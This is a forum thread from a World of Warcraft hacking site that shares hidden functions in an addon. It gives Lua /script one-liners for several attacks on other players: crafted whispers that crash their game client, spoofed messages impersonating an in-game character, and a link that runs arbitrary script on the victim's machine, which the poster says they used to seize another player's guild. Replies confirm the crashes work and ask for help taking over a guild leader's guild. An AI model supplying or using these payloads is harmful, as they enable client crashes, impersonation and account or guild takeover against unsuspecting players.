Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Crash other's WoW with trickery (Tips and Tricks)

Over a month ago, the final release of KnowItAll from RAoV's Hp94 came out. It's still at that status on curse, sitting stagnant since his silent departure.

Download:

KnowItAll - Addons - Curse

FTestFunction:

There are a couple people who are still going through the code, and are still finding things that he never told us. One of them is his 'test' functions. Using "FTestFunction" (You must download the addon), you can actually cause a fatal error with a hyperlink. To do this, simply open up your friends list. Count how far down someone is on the list (Top = 1, next = 2, etc). Type:

/dump BNGetFriendInfo(number)

number being the number down they are. You need to do this for every single ID you want to get. That will print out:

dump:
    [1] = newNumber
    [2] = etc...

Next: Type:

/script FTestFunction(newNumber)

You will find that they will go offline, and very quickly They have received a fatal error message, because WoW has crashed (Note to self: Don't try linking in /2). You can do this to anyone over real ID. You can send it to anyone who you have as 'friends', although after a few times they wise up to what's happening.

Other Functions:

There are also other useful functions.
    CTestFunction: Allows any spell to become part of any text. It sends "Entire Message", and when clicked, shows the link to Death Touch. If you go into the file, KnowItAllDungeonBuddy.lua, and go to the bottom (Or use ctrl-F), you will see:

function CTestFunction(presence_ID)
    BNSendWhisper(presence_ID, "|cff71d5ff|Hspell:5|hEntire Message|h|r")
    end

Where the text is, "Entire Message", is where you want to replace it with your text, anything you want. The "5", inside, is the SpellID. You can make it so when it is clicked, it shows any spell you choose. All the test functions are in the same place and in the same format.

function ETestFunction(ID)
    BNSendWhisper(ID, "|Hplayer:[Frostmourne]|h[The Lich King] whispers: You will betray your allies!|h")
    end

This sends a message that looks like the Lich King has whispered you, saying you will betray your allies. When you try to reply, it replies to Frostmourne (Sending a message gives 'Frostmourne is not online'). Change [Frostmourne] to anyones name, [The Lich King] for replies, and You will betray your allies for the message.

function XTestFunction(ID, script, link)
    BNSendWhisper(ID, "|HKIA_LINK:KIA_R"..script.."|h"..link.."|h")
    end

This looks like it will actually run any script you type in on the other computer. As soon as they click on the link. I was able to take Oomo's guild simply by having him click on a hyperlink that said "Check out [item]!". He has control back.

function HTestFunction(ID)
    BNSendWhisper(ID, "|cffff8000|Hinstancelock:068000000445A2C7:169:0:15|h[Emerald Dream]|h|r")
    end

This function allows even normal clients to look up which ID a map is for. For instance, that is some players instance lock for the Emerald Dream. Change the 068000000445A2C7 to whatever your GUID is (/dump UnitGUID("player") to find your own). Change the "169" to whatever map ID you want to send a completed instance lock of (Can be changed to incomplete... somehow).

ITestFunction does not seem to work. JTestFunction, unfortunately, looks like it is an attempt to send a texture along with a GM player link. It doesn't work (anymore?). There is also a comment with the entire argument list, so it looks like there was something that was still going on, but was abandoned:

--"|HplayerGM:"..arg2..":"..arg11.."|h".."["..arg2.."]".."|h")..arg1;

Additional Functions

These are edits in of additional functions found. Recently, there was a post in Elite of Hp94's (Now gone? I can't find where the posts went) of how to cast GM Spells, including the Internal Knowledge spell. Blizzard very quickly hotfixed being able to cast spells you do not know. Then, they put out a patch soon after making sure you can not put any spells you do not explictily know into the action bars. Attached to the medals frame in KnowItAll, is a secure casting frame that bypasses all of Blizzards changes, every one of them. In order to see it, type:

/kia m

And the medals frame appears. Next, type:

/script PortBox_Teleport1:Show()

Now you have your frame shown. You can set it to attempt to cast any spell on click by using:

/kia setc spellID

For instance, /kia setc 5 will make it try to cast Death Touch. This makes going through the list of 50,000+ spells possible again, to find more mishaps on Blizzards end (The flares were one, Internal Knowledge, 20 second friendly party member stun, etc. There's a mistake every couple thousand tries and a new castable spell is found).

<More>

Scripts to allow use of the functions without the addon (Not recommended! - But will work almost the same).

Code:
    /script function FTestFunction(ID) BNSendWhisper(ID, "|cffFF4E00|Hlevelup:-1:LEVEL_UP_TYPE_CHARACTER|hHey, guess what I just got? its [Fetish of the Bloodthirsty Gladiator] |h|r"); end
    Code:
    /script function CTestFunction(ID) BNSendWhisper(presence_ID, "|cff71d5ff|Hspell:5|hEntire Message|h|r"); end
    Code:
    /script function ETestFunction(ID) BNSendWhisper(ID, "|Hplayer:[Frostmourne]|h[The Lich King] whispers: You will betray your allies!|h"); end
    Code:
    /script function XTestFunction(ID, script, link) BNSendWhisper(ID, "|HKIA_LINK:KIA_R"..script.."|h"..link.."|h"); end
    Code:
    /script HTestFunction(ID) BNSendWhisper(ID, "|cffff8000|Hinstancelock:068000000445A2C7:169:0:15|h[Emerald Dream]|h|r"); end
    Code:
    /script JTestFunction(ID) local pflag = "|TInterface\\ChatFrame\\UI-ChatIcon-Blizz.blp:0:2:0:-3|t "; BNSendWhisper(ID, "|HGMChat|h["..pflag.."]|h"); end
    <More>

There is a list of "!" commands in many chat messages. I'll make a list, but I don't think I'll have time to go through all of them and see what they do.

When you are whispered:
    !joke --replys with a joke
    !lookup --allows remote lookups of every single spell in the game
    !RunScript --'blocked' - most likely because it will actually cause you to run any script if whispered correctly
    !say --makes you talk, with a tag, you can 'ban' people who abuse this
    !guild --makes you talk in guild with a nice tag. You can ban people who abuse this
    !encrpyt $
    !encrpyt #
    !encrpyt S
    !connect --connect to guild chat (literally)
    !disconnect --disconnect from guild chat (literally)
    !dc --same
    !list
    !emote --do an emote
    !info
    !help --help!
    !who
    !send
    --needs format !send <something> {somethingElse} moreSomethings

When you whisper someone else:
    !ban --bans them from using your own KnowItAll chat functions
    !kick --kicks them from the guild chat, if they are connected
    !remove --same
    !unban --allows them to use you KnowItAll chat functions again

When someone says this in battleground:
    !encrpyt $
    !encrpyt #
    !encrypt S
    !joke --replies with a joke
    !strat --if someone says !strategy in a battleground, you will actually say the battleground strategy out loud. Super awesome

When someone says this in a party or raid:
    !encrpyt $
    !encrpyt #
    !encrypt S
    !joke --replies with a joke

On Battle.net Whisper:
    !help --replies with help
    !who
    !send
    --seems to need format !send <something> {somethingMore} somethingElse

Those are all the 'inside' chat commands. If you whisper a message to someone with !ban, the addon will do something. When you are whispered !connect, the addon will do something else. This is almost a compelte list.

Notes:

There seems to be alot of missing letters. Who knows what those functions could have been. Until then, feel free to use these while we look through the code to see if there are any other functions (Currently over 10,000 total, anyone can look themselves and post if they find anything else useful, I'll +rep). We'll see how far the rabbit hole goes.

Video will be up later!
    Last edited by shorstuff910mc; 04-16-2011 at 08:53 PM.

Crash other's WoW with trickery (Tips and Tricks)
    Wetop's Avatar Elite User
    Thanks G/R
    15/22
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Tried the DC thing and it worked perfectly, but seeing as the noob i am i can't figure out how to use the other stuff, like the Lich King message thing... Any more info would be awesome

zwala's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    wat is the script for taking over a guild ?

XSilentiumX's Avatar Sergeant Major
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'm in the same boat as Jammu69, don't know how to work the others like the LK one, and just wondering how you link the Fetish of bloodthirsty gladiator in trade chat?

---------- Post added at 09:37 PM ---------- Previous post was at 09:25 PM ----------

Also, how do you do it to non-real ID friends?
    Last edited by XSilentiumX; 04-16-2011 at 03:33 PM.

matz77's Avatar Corporal
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I can not get the disconnect thing to work, i have the addon and i did the excact thing u said. Is it because im from europe maybe?

syphilis's Avatar Active Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The dc's work fine. I'd love to get some more detail on the rest, though.

I stuck that lovin' .44 beneath my head.

matz77's Avatar Corporal
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Explain how you get it to work please. I would love to know. For excample i do
    /dump BNGetFriendInfo4
    And then the script with some other number is that doing it wrong? If so please explain as i have no idea how this addon works.

Bazra's Avatar Master Sergeant
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Cool stuff.

Question about /kia setc: are there any non-player spells left we can actually cast via this? Besides our own, of course. Blizz's fix that prevents us from casting spells we don't know seems pretty all encompassing.

matz77's Avatar Corporal
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Bazra nope.. I dont think /KIA setc has any castable spells anymore since they all got hotfixeeed.d..

Horneyyy's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This is epic. can you change the message it sends when you wanna crash them in the lua file?

Ground Zero's Avatar ★ Elder ★
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Haha I love the LK one. Another great release, thanks! Also i'm going to sneak crash kurs client when he leasts expects it.

matz77's Avatar Corporal
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Could someone PLEASE explain how to do the crash one. I did the dump at person number 8. Then i did the script at person number 8 and nothing worked il put in the excact thing i wrote
    /dump BNGetFriendInfo8
    /script FTestFunction8

---------- Post added 04-17-2011 at 12:00 AM ---------- Previous post was 04-16-2011 at 11:54 PM ----------

UPDATE i found out that what its supposted to print its not printing. Its saying BNGetFriendInfo8=nil
    Empty result.

Ground Zero's Avatar ★ Elder ★
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by matz77 View Post
    Could someone PLEASE explain how to do the crash one. I did the dump at person number 8. Then i did the script at person number 8 and nothing worked il put in the excact thing i wrote
    /dump BNGetFriendInfo8
    /script FTestFunction8

---------- Post added 04-17-2011 at 12:00 AM ---------- Previous post was 04-16-2011 at 11:54 PM ----------

UPDATE i found out that what its supposted to print its not printing. Its saying BNGetFriendInfo8=nil
    Empty result.
    You need to put the numbers in parentheses

IE /script FTestFunction(

InTeNsO87's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Code:
    /dump BNGetFriendInfo(1) <first player in my list
    chat: 5, "|Kg5|k00000|k", "|Ks5|k000000|k", "friend", 10, "WoW", true, somenumbers, false, false, "", nil, true, 0
    5 is the new number then

jimmys96's Avatar Legendary
    Thanks G/R
    224/210
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    function XTestFunction(ID, script, link)
    BNSendWhisper(ID, "|HKIA_LINK:KIA_R"..script.."|h"..link.."|h")
    end

This looks like it will actually run any script you type in on the other computer. As soon as they click on the link. I was able to take Oomo's guild simply by having him click on a hyperlink that said "Check out [item]!". He has control back.

Explain this a little more, i wanna take over my gleaders level 25 guild.....

Page 1 of 5 12345 LastLast